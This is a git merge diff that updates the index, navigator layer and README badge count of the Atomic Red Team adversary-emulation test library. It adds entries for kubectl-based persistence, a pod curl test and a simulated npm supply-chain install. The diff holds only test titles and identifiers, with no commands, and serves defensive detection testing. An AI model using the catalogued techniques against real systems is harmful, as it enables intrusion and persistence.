Merge branch 'master' into issue_template_fix

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1744-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1748-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 
 Atomic Red Team™ is a library of tests mapped to the

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -6,6 +6,7 @@ credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-
 credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh

atomics/Indexes/Indexes-CSV/index.csv

@@ -950,6 +950,7 @@ privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistenc
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -1103,6 +1104,7 @@ execution,T1569.002,System Services: Service Execution,7,Modifying ACL of Servic
 execution,T1569.002,System Services: Service Execution,8,Pipe Creation - PsExec Tool Execution From Suspicious Locations,004a5d68-627b-452d-af3d-43bd1fc75a3b,powershell
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -1289,6 +1291,7 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux
 persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
 persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
 persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -1427,6 +1430,7 @@ persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automat
 persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
@@ -1526,6 +1530,7 @@ command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.e
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
 command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
 command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
+command-and-control,T1105,Ingress Tool Transfer,39,Curl Insecure Connection from a Pod,7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3,bash
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
@@ -2222,6 +2227,7 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
+initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -445,6 +445,7 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
+initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -236,7 +236,8 @@
 - T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -268,7 +269,8 @@
 - T1204.004 Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 
 # persistence
 - T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -308,7 +310,8 @@
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
+  - Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
 - T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -355,7 +358,8 @@
 - T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -401,7 +405,8 @@
 - T1219.002 Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
+  - Atomic Test #39: Curl Insecure Connection from a Pod [containers]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -606,7 +611,8 @@
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
+  - Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -1266,6 +1266,7 @@
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
@@ -1470,6 +1471,7 @@
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 
 # persistence
 - [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
@@ -1708,6 +1710,7 @@
   - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
   - Atomic Test #8: Create a new Windows admin user [windows]
   - Atomic Test #9: Create a new Windows admin user via .NET [windows]
+  - Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
 - T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
@@ -1912,6 +1915,7 @@
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
+  - Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
@@ -2061,6 +2065,7 @@
   - Atomic Test #36: Windows push file using sftp.exe [windows]
   - Atomic Test #37: Windows pull file using sftp.exe [windows]
   - Atomic Test #38: Download a file with OneDrive Standalone Updater [windows]
+  - Atomic Test #39: Curl Insecure Connection from a Pod [containers]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -3094,7 +3099,8 @@
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
+  - Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -890,7 +890,8 @@
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
+  - Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Matrices/linux-matrix.md

@@ -14,7 +14,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection 